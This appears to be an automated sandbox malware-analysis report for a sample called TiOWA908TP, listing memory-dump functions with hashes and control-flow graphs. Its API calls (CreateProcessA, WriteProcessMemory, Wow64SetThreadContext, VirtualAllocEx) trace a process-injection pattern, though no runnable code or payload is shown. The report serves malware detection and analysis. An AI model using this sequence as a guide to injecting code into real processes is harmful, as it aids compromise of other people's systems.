                                      • Source File: 00000000.00000002.1699307632.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5b80000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID: CreateProcess
                                      • String ID: $Gkr
                                      • API String ID: 963392458-1136909900
                                      • Opcode ID: 68ebf94bb23c18a6fd111e2b61c246ee4641cd7a358aea8d7a01fd41182df1a7
                                      • Instruction ID: ee3e8eb906c790736be6405e3cbea90033defe57fab8140129ed28552a4f362d
                                      • Opcode Fuzzy Hash: 68ebf94bb23c18a6fd111e2b61c246ee4641cd7a358aea8d7a01fd41182df1a7
                                      • Instruction Fuzzy Hash: 40814875D0065A9FDF10DFA9C8857EDBBF1FF48318F248169E865A7244D7349881CB81
                                      Function 05B846E0 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 201processCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 46 5b846e0-5b84750 48 5b84789-5b847a9 46->48 49 5b84752-5b8475c 46->49 54 5b847ab-5b847b5 48->54 55 5b847e2-5b8481c 48->55 49->48 50 5b8475e-5b84760 49->50 51 5b84762-5b8476c 50->51 52 5b84783-5b84786 50->52 56 5b8476e 51->56 57 5b84770-5b8477f 51->57 52->48 54->55 58 5b847b7-5b847b9 54->58 65 5b8481e-5b84828 55->65 66 5b84855-5b848ca CreateProcessA 55->66 56->57 57->57 59 5b84781 57->59 60 5b847bb-5b847c5 58->60 61 5b847dc-5b847df 58->61 59->52 63 5b847c9-5b847d8 60->63 64 5b847c7 60->64 61->55 63->63 67 5b847da 63->67 64->63 65->66 68 5b8482a-5b8482c 65->68 76 5b848cc-5b848d2 66->76 77 5b848d3-5b8491b 66->77 67->61 70 5b8482e-5b84838 68->70 71 5b8484f-5b84852 68->71 72 5b8483a 70->72 73 5b8483c-5b8484b 70->73 71->66 72->73 73->73 75 5b8484d 73->75 75->71 76->77 82 5b8492b-5b8492f 77->82 83 5b8491d-5b84921 77->83 85 5b8493f-5b84943 82->85 86 5b84931-5b84935 82->86 83->82 84 5b84923 83->84 84->82 88 5b84953 85->88 89 5b84945-5b84949 85->89 86->85 87 5b84937 86->87 87->85 91 5b84954 88->91 89->88 90 5b8494b 89->90 90->88 91->91
                                      APIs
                                      • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 05B848BA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1699307632.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5b80000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID: CreateProcess
                                      • String ID: $Gkr
                                      • API String ID: 963392458-1136909900
                                      • Opcode ID: 39f8237c61d25039de6047b97304cbc4c91b113291d6ac0941a7cebad9554140
                                      • Instruction ID: fdacf58e03eb49b5f0a2ce9736927eee5e2388ac0831c1751e6a0130e3a9f724
                                      • Opcode Fuzzy Hash: 39f8237c61d25039de6047b97304cbc4c91b113291d6ac0941a7cebad9554140
                                      • Instruction Fuzzy Hash: 5D815975D0065A9FDF10DFA9C8857ADBBF1FF48314F148169E825A7244D734A881CB81
                                      Function 05B86D61 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 71injectionCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 92 5b86d61-5b86db6 95 5b86db8-5b86dc4 92->95 96 5b86dc6-5b86e05 WriteProcessMemory 92->96 95->96 98 5b86e0e-5b86e3e 96->98 99 5b86e07-5b86e0d 96->99 99->98
                                      APIs
                                      • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 05B86DF8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1699307632.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5b80000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID: MemoryProcessWrite
                                      • String ID: $Gkr
                                      • API String ID: 3559483778-1136909900
                                      • Opcode ID: 70b2cc2ce31374082f5b79d561b31c0e76b9253ac361d33aea0134bc7660f17c
                                      • Instruction ID: 3999cacfbf1ea166f450148f87f9d2c9f612ca07a4565a7b4abbd76d61a86be9
                                      • Opcode Fuzzy Hash: 70b2cc2ce31374082f5b79d561b31c0e76b9253ac361d33aea0134bc7660f17c
                                      • Instruction Fuzzy Hash: 252128759002599FCB10DFA9C984BEEBBF5FF48310F14842AE919A7240D778A944CFA4
                                      Function 05B86D68 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 69injectionCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 103 5b86d68-5b86db6 105 5b86db8-5b86dc4 103->105 106 5b86dc6-5b86e05 WriteProcessMemory 103->106 105->106 108 5b86e0e-5b86e3e 106->108 109 5b86e07-5b86e0d 106->109 109->108
                                      APIs
                                      • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 05B86DF8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1699307632.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5b80000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID: MemoryProcessWrite
                                      • String ID: $Gkr
                                      • API String ID: 3559483778-1136909900
                                      • Opcode ID: 4d9d84b6f41bc66d3311486a159dbff4f1d9bba73ae11f6e958150c8b1e0027c
                                      • Instruction ID: 6ef3ab0d04d594384c3c1f897b8ca0c8ff621fe4ba9a7b9a1796529d21413c2a
                                      • Opcode Fuzzy Hash: 4d9d84b6f41bc66d3311486a159dbff4f1d9bba73ae11f6e958150c8b1e0027c
                                      • Instruction Fuzzy Hash: 822128759002599FCB10DFA9C944BEEBBF5FF48310F10842AE919A7240D778A944CFA4
                                      Function 05B86551 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64threadCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 122 5b86551-5b865a3 124 5b865b3-5b865e3 Wow64SetThreadContext 122->124 125 5b865a5-5b865b1 122->125 127 5b865ec-5b8661c 124->127 128 5b865e5-5b865eb 124->128 125->124 128->127
                                      APIs
                                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 05B865D6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1699307632.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5b80000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID: ContextThreadWow64
                                      • String ID: $Gkr
                                      • API String ID: 983334009-1136909900
                                      • Opcode ID: 30a30daa0e586e02260ed6bd2bcf75770a92e6e5292b63e5fd83746b61ff0593
                                      • Instruction ID: 231bcb711063df92a83ad68318b1c428c3e44544913442692062e3499bac7778
                                      • Opcode Fuzzy Hash: 30a30daa0e586e02260ed6bd2bcf75770a92e6e5292b63e5fd83746b61ff0593
                                      • Instruction Fuzzy Hash: B3213975D002098FDB10DFA9C8847EEBBF5EF58314F24842ED859A7280C778A944CF94
                                      Function 05B86558 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63threadCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 140 5b86558-5b865a3 142 5b865b3-5b865e3 Wow64SetThreadContext 140->142 143 5b865a5-5b865b1 140->143 145 5b865ec-5b8661c 142->145 146 5b865e5-5b865eb 142->146 143->142 146->145
                                      APIs
                                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 05B865D6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1699307632.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5b80000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID: ContextThreadWow64
                                      • String ID: $Gkr
                                      • API String ID: 983334009-1136909900
                                      • Opcode ID: ddc88faefaa51608cf5251f194c8ea846cdc2ca25e5f6b6782bf47c9f1f2ec50
                                      • Instruction ID: caf32fff54e56cfaa88e72cbdca57be0af1071d5893efd251bab22c0902fc3ae
                                      • Opcode Fuzzy Hash: ddc88faefaa51608cf5251f194c8ea846cdc2ca25e5f6b6782bf47c9f1f2ec50
                                      • Instruction Fuzzy Hash: 6B211A75D002098FDB10DFAAC8447EEBBF5EF58310F24842AD519A7280DB78A944CFA5
                                      Function 068F0978 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 58memoryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 150 68f0978-68f0a01 VirtualProtect 153 68f0a0a-68f0a2f 150->153 154 68f0a03-68f0a09 150->154 154->153
                                      APIs
                                      • VirtualProtect.KERNEL32(?,?,?,?), ref: 068F09F4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1701516965.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_68f0000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID: ProtectVirtual
                                      • String ID: $Gkr
                                      • API String ID: 544645111-1136909900
                                      • Opcode ID: 3d1fffaf94441c067dc631b4668949d3898a25223e5c0e1612cbfe6bccc59284
                                      • Instruction ID: 3c9ab0692528a3fe92323a4f263a2359dfd49063aabff2d2b94c519eb38d4088
                                      • Opcode Fuzzy Hash: 3d1fffaf94441c067dc631b4668949d3898a25223e5c0e1612cbfe6bccc59284
                                      • Instruction Fuzzy Hash: 1B213875D002498ECB10DFAAC844AAEFBF5FF48310F20842ED569A3240D7745544CF90
                                      Function 05B86AF0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56memoryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 158 5b86af0-5b86b73 VirtualAllocEx 162 5b86b7c-5b86ba1 158->162 163 5b86b75-5b86b7b 158->163 163->162
                                      APIs
                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05B86B66
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1699307632.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5b80000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID: $Gkr
                                      • API String ID: 4275171209-1136909900
                                      • Opcode ID: 714cf4bbadd262849324e39907b9410081b0bad1cecdc1fc3c9d91a48a790cb6
                                      • Instruction ID: eddd28599be0953320ca0612826bf6d58c2c18ab9bf7d2edd455104f23d71282
                                      • Opcode Fuzzy Hash: 714cf4bbadd262849324e39907b9410081b0bad1cecdc1fc3c9d91a48a790cb6
                                      • Instruction Fuzzy Hash: DC116A768002099FCB10DFAAC844BEFBFF5EF48310F24881AD519A7280C779A944CFA4
                                      Function 068F0980 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56memoryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 167 68f0980-68f0a01 VirtualProtect 170 68f0a0a-68f0a2f 167->170 171 68f0a03-68f0a09 167->171 171->170
                                      APIs
                                      • VirtualProtect.KERNEL32(?,?,?,?), ref: 068F09F4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1701516965.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_68f0000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID: ProtectVirtual
                                      • String ID: $Gkr
                                      • API String ID: 544645111-1136909900
                                      • Opcode ID: 2fefbaa4c711e78174256290675be77b0a87ab4f1451f5e3a1311ab1af3c5611
                                      • Instruction ID: f366da156f2676813f98cd996e61f0b562ad366b9074958f0fd246918451afa2
                                      • Opcode Fuzzy Hash: 2fefbaa4c711e78174256290675be77b0a87ab4f1451f5e3a1311ab1af3c5611
                                      • Instruction Fuzzy Hash: 4511F7B5D002499FDB10DFAAC844AAEFBF5EF58310F20842AD519A7240D779A944CFA5
                                      Function 06CE1F98 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 192 6ce1f98-6ce2014 SleepEx 195 6ce201d-6ce2042 192->195 196 6ce2016-6ce201c 192->196 196->195
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1702991156.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6ce0000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID: Sleep
                                      • String ID: $Gkr
                                      • API String ID: 3472027048-1136909900
                                      • Opcode ID: 463ca91b83807a087d56031bca7d5b4958ddee840f87e6bae0618821820530d2
                                      • Instruction ID: 7b6ba0b4d7947ade2e98d212f5e4625b132546770514c6f8277c9403603f8b36
                                      • Opcode Fuzzy Hash: 463ca91b83807a087d56031bca7d5b4958ddee840f87e6bae0618821820530d2
                                      • Instruction Fuzzy Hash: C3111CB5D002598EDB10DFAAD8447EEFFF9AF48310F24841ED455A7280DB79A944CFA4
                                      Function 05B86AF8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53memoryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 200 5b86af8-5b86b73 VirtualAllocEx 203 5b86b7c-5b86ba1 200->203 204 5b86b75-5b86b7b 200->204 204->203
                                      APIs
                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05B86B66
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1699307632.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5b80000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID: $Gkr
                                      • API String ID: 4275171209-1136909900
                                      • Opcode ID: b1e787c61d40598266c266fec7192ff76d39a3916017659e5b8bee3256322b33
                                      • Instruction ID: f9b72864b6e762a8d3ec31b241571412a8b6957e1a9547b48ae0bcfeabf96cbb
                                      • Opcode Fuzzy Hash: b1e787c61d40598266c266fec7192ff76d39a3916017659e5b8bee3256322b33
                                      • Instruction Fuzzy Hash: FA1137758002499FCB10DFAAC844BEEBFF5EF48310F24881AD919A7290C779A944CFA4
                                      Function 06CE1F90 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1702991156.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6ce0000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID: Sleep
                                      • String ID: $Gkr
                                      • API String ID: 3472027048-1136909900
                                      • Opcode ID: 4a8676e3b6e8e3a2a7fe47cfefc0bbae11c9418e8cc847ead04109b4dca8d7e1
                                      • Instruction ID: be18ea6f73b6d8041b1fb76eae8e6d9cfb2d51c83fe88fff5f37e243457c1cb8
                                      • Opcode Fuzzy Hash: 4a8676e3b6e8e3a2a7fe47cfefc0bbae11c9418e8cc847ead04109b4dca8d7e1
                                      • Instruction Fuzzy Hash: E6118EB5D002598EDB10CFAAC8447EEFFF8AF48310F24881ED455A7280C738A944CFA4
                                      Function 068F1961 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 55memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • VirtualAlloc.KERNEL32(?,?,?,?), ref: 068F19D3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1701516965.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_68f0000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID: $Gkr
                                      • API String ID: 4275171209-1136909900
                                      • Opcode ID: 5fe66afd7269eaf0b2911046f7df71aaa5f0c664a9db29558b49002e753d826f
                                      • Instruction ID: 16b5364236a6ce5cfc7eea14a7fae27e21f9a3718816807e15c765748501bd96
                                      • Opcode Fuzzy Hash: 5fe66afd7269eaf0b2911046f7df71aaa5f0c664a9db29558b49002e753d826f
                                      • Instruction Fuzzy Hash: 27112675D002098FDB10DFAAC844BEEFBF5EF98310F24881AD559A7290CB79A944CF95
                                      Function 068F1968 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 52memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • VirtualAlloc.KERNEL32(?,?,?,?), ref: 068F19D3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1701516965.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_68f0000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID: $Gkr
                                      • API String ID: 4275171209-1136909900
                                      • Opcode ID: 8937e8d1232ffe841bfebd3cd6ccbb9ecc3c9094cb92e854123c7840da37e27a
                                      • Instruction ID: df5b152b62cb8d673557a8b202776c2f8f35f8b8c5b19212c1f40e2c107d101a
                                      • Opcode Fuzzy Hash: 8937e8d1232ffe841bfebd3cd6ccbb9ecc3c9094cb92e854123c7840da37e27a
                                      • Instruction Fuzzy Hash: 0F110A75D002499FDB10DFAAC8447DEBFF5EF48310F24881AD559A7240CB75A544CF94
                                      Function 013512F6 Relevance: 2.6, Strings: 2, Instructions: 87COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1680351514.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1350000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $Gkr$$Gkr
                                      • API String ID: 0-2211524788
                                      • Opcode ID: 0de44c073941eb10ba69ff65d5eb649f055d99ddae346931e7e46ab4921c7a30
                                      • Instruction ID: 8bc2b41e954c853d51f8b78b829473e3334a606f07e94e7292754849b1cb64f7
                                      • Opcode Fuzzy Hash: 0de44c073941eb10ba69ff65d5eb649f055d99ddae346931e7e46ab4921c7a30
                                      • Instruction Fuzzy Hash: 8A3139B4D002499FDB54CFA9D984ADEBFF5AF48310F24802DE808AB350D7389945CF90
                                      Function 01351300 Relevance: 2.6, Strings: 2, Instructions: 83COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1680351514.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1350000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $Gkr$$Gkr
                                      • API String ID: 0-2211524788
                                      • Opcode ID: 2ac62fce6d3bb0b2bdd4ee8c1c90881b9f52809b7a4692e58cdb2debd468bf74
                                      • Instruction ID: 9d90792e2299c05272a2538a7dd55cbf008bfce1e59b80be2b1c7cb49df83b85
                                      • Opcode Fuzzy Hash: 2ac62fce6d3bb0b2bdd4ee8c1c90881b9f52809b7a4692e58cdb2debd468bf74
                                      • Instruction Fuzzy Hash: FE3115B4D002499FDB14CFAAD984ADEBFF5AF48300F248429E819AB390DB359945CF90
                                      Function 05CAF260 Relevance: 1.6, Strings: 1, Instructions: 344COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1699653252.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5ca0000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: d
                                      • API String ID: 0-2564639436
                                      • Opcode ID: 9aaafffcfe2346ab6d0d49ed5a74e3c27eb8a02402f907ac76ee24f8766f5841
                                      • Instruction ID: 9ff9114f8f0b615d4278b61121d3daa923939eddb61d074b7d28cba2e2b1bc72
                                      • Opcode Fuzzy Hash: 9aaafffcfe2346ab6d0d49ed5a74e3c27eb8a02402f907ac76ee24f8766f5841
                                      • Instruction Fuzzy Hash: A6D17A356006068FCB14CF28C48496ABBF6FF88314B25CA6DD55A9B795EB30FD42CB90
                                      Function 05CA0B04 Relevance: 1.5, Strings: 1, Instructions: 238COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1699653252.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5ca0000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: @
                                      • API String ID: 0-2766056989
                                      • Opcode ID: db7344f0c143d3a3fe6dc51b0500c79fff76eb799c129268329f16fea21a0642
                                      • Instruction ID: 4155e4f61cd1b15a1519f78f3f4d30f3484ff9a7567940e8bb8b3825d719a819
                                      • Opcode Fuzzy Hash: db7344f0c143d3a3fe6dc51b0500c79fff76eb799c129268329f16fea21a0642
                                      • Instruction Fuzzy Hash: 83C1AC78A052698FDB60DF69D844BE9BBF2BB49304F1084EAD94DA7344DB705E84CF50
                                      Function 05CA9201 Relevance: 1.4, Strings: 1, Instructions: 180COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1699653252.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5ca0000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: !
                                      • API String ID: 0-2657877971
                                      • Opcode ID: c747479915802ef347f15351967726c23268bb3a353cc577092bd87dda09a487
                                      • Instruction ID: 5d25aa55bfbd68d8945df347220c5b4d32505576c3190eddc99937ccbcf9832d
                                      • Opcode Fuzzy Hash: c747479915802ef347f15351967726c23268bb3a353cc577092bd87dda09a487
                                      • Instruction Fuzzy Hash: B981F775A04219CFCB10CFA9D889AEDBBF2FB8D308F108259E919AB391C7359844CF55
                                      Function 05CAB6FD Relevance: 1.4, Strings: 1, Instructions: 122COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1699653252.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5ca0000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: t[#)
                                      • API String ID: 0-1508624011
                                      • Opcode ID: 91f7548b03e834e275f86925be36c24ede7278a57683e3780ebb8a50cb055a67
                                      • Instruction ID: 8058692d9b9d75834392d24d6f3a02c564922c0714ca58ba9982980c47b3b59a
                                      • Opcode Fuzzy Hash: 91f7548b03e834e275f86925be36c24ede7278a57683e3780ebb8a50cb055a67
                                      • Instruction Fuzzy Hash: 8C513C75A051198FDB54DF69CC54BAAB7B2FB88304F1082A9D40DEB394DB349D81CF50
                                      Function 05CAB45C Relevance: 1.4, Strings: 1, Instructions: 109COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1699653252.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5ca0000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: t[#)
                                      • API String ID: 0-1508624011
                                      • Opcode ID: 40c18c8b35351a5f4ed81fbb78d0019df443d704bd22b2cddd67d1bd65e1ffe9
                                      • Instruction ID: 24ddbdacbd1d8a076f5d32a83a05e41c1cb15a3f42b9fb58143b51e8f1879e2a
                                      • Opcode Fuzzy Hash: 40c18c8b35351a5f4ed81fbb78d0019df443d704bd22b2cddd67d1bd65e1ffe9
                                      • Instruction Fuzzy Hash: 62413A35A011198FDB64DF69CD50BAAB7B6FB88204F1082E9D90DEB384DB349E85CF50
                                      Function 05CA82DA Relevance: 1.3, Strings: 1, Instructions: 50COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1699653252.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5ca0000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ,
                                      • API String ID: 0-3772416878
                                      • Opcode ID: bb74051f17837ff36aaf5060fddeb02758abfa8ee045da753720b45baea9b9ac
                                      • Instruction ID: 3500b42c7d4ea0dee612108adeb0e8d076042bd13b5a8843d2a00f7400d150da
                                      • Opcode Fuzzy Hash: bb74051f17837ff36aaf5060fddeb02758abfa8ee045da753720b45baea9b9ac
                                      • Instruction Fuzzy Hash: AE21B2B4A14229DFCB14CFA9E494BADBBF2FF09318F004995E819A7352C7749981CF11
                                      Function 068F1A18 Relevance: 1.3, APIs: 1, Instructions: 49memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • VirtualAlloc.KERNEL32(?,?,?,?), ref: 068F19D3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1701516965.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_68f0000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      • Opcode ID: 484cfd872f45786733e5dd87bcd9e8be016ea67bc93f55953b1035be05fe817a
                                      • Instruction ID: 5f9586ad1ae7c544b1a43a57cb9a008d25181c7f9352cada44e8c7cde4fba9b0
                                      • Opcode Fuzzy Hash: 484cfd872f45786733e5dd87bcd9e8be016ea67bc93f55953b1035be05fe817a
                                      • Instruction Fuzzy Hash: 8601F531904348CBC711EBBCE80479DFBF4EF81310F20889EC9C9A72A1CA355995CB92
                                      Function 06942958 Relevance: 1.3, Strings: 1, Instructions: 27COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1701724664.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6940000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 1
                                      • API String ID: 0-2212294583
                                      • Opcode ID: b02d3cae33126d5d38b0460e43adb63e1ff38321cf082b04730c7c95deb48b22
                                      • Instruction ID: 08fc462d31b2a03831135dfca06b75f535261c56a99ff7e494f8528d41693ac0
                                      • Opcode Fuzzy Hash: b02d3cae33126d5d38b0460e43adb63e1ff38321cf082b04730c7c95deb48b22
                                      • Instruction Fuzzy Hash: CBF0FF30D14229CFDB90EFA8D884BACBBB4BF08308F1005A6D509A7A41D7B05985CB45
                                      Function 0135877B Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1680351514.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1350000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: J
                                      • API String ID: 0-1141589763
                                      • Opcode ID: 20bd8d516b3f926d04b60e5636c2823b5e22843e60ac32e90f1ba72c75b5f87e
                                      • Instruction ID: 707648024e29e1051f9034f20beea3d8716a4ebeda9aa909a662bdf4d22af541
                                      • Opcode Fuzzy Hash: 20bd8d516b3f926d04b60e5636c2823b5e22843e60ac32e90f1ba72c75b5f87e
                                      • Instruction Fuzzy Hash: 1F0154B4D002A8CFDBA5DF24D958799BBF6BB48305F0045DA990EB3254DB740A84DF15
                                      Function 06941800 Relevance: 1.3, Strings: 1, Instructions: 12COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1701724664.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6940000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: T
                                      • API String ID: 0-3187964512
                                      • Opcode ID: 2aa3a35f070199cfaf612b2821e3b035bb8310a59e635ace97b02e908e5effc6
